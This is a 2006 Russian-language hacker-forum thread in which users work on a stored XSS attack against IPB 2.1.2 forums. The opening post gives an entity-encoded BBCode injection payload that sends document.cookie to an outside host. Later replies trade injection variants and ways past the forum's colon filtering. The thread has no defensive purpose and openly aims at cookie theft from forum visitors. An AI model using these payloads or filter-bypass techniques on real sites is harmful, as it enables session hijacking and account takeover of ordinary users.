Вопрос про XSS на форуме IPB 2.1.2.

Discussion in 'Песочница' started by Astro, 9 Jan 2006.

  1. Astro

    Astro Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    29
    Likes Received:
    2
    Reputations:
    3
    Вот пытаюсь вставить эту XSS:
    HTML:
    [post=1000[topic=target style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]       [/topic]]
    Естественно без звездочек, пост на форуме пустой если поставить алерт
    HTML:
    [post=1000[topic=target style=background:url(javascript:alert()); ]       [/topic]]
    , то он не выскакивает.
     
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    каким браузером?
     
  3. Astro

    Astro Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    29
    Likes Received:
    2
    Reputations:
    3
    Ie 6.0
     
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Попробуй таким макаром
    HTML:
    [topic=1000[post=aaa/ style=background:url(javascript:alert()); [/topic][/post]
     
    1 person likes this.
  5. Astro

    Astro Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    29
    Likes Received:
    2
    Reputations:
    3
    Не выходит, даже код не скрывает.
     
  6. Astro

    Astro Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    29
    Likes Received:
    2
    Reputations:
    3
    Насколько я поял, дело здесь в том, что форум не пропускает двоеточие :
    Вот код поста после отсылки его на форум ( Без звездочки)
    HTML:
    		<div class="postcolor" style='padding:4px;'><a href='index.php?act=findpost&pid=1000<a href='index.php?showtopic=target style=background&*#58;url(java script:alert()); '>       </a>'><br /><br /><br /></a></div>
    Есть ли возможность обойти это, или подскажите какой нибудь другой код для XSS...
     
    #6 Astro, 10 Jan 2006
    Last edited: 10 Jan 2006
  7. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    &*#58; естественно без звезды
     
  8. Astro

    Astro Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    29
    Likes Received:
    2
    Reputations:
    3
    Ну просто без звезды здесь &*#58; пробразуеться в двоеточие, а это уже не то, что было в коде поста, после отправки на форум.
    Так есть ли другой код или способ обойти фильтрацию двоеточий?
     
    #8 Astro, 10 Jan 2006
    Last edited: 11 Jan 2006
Loading...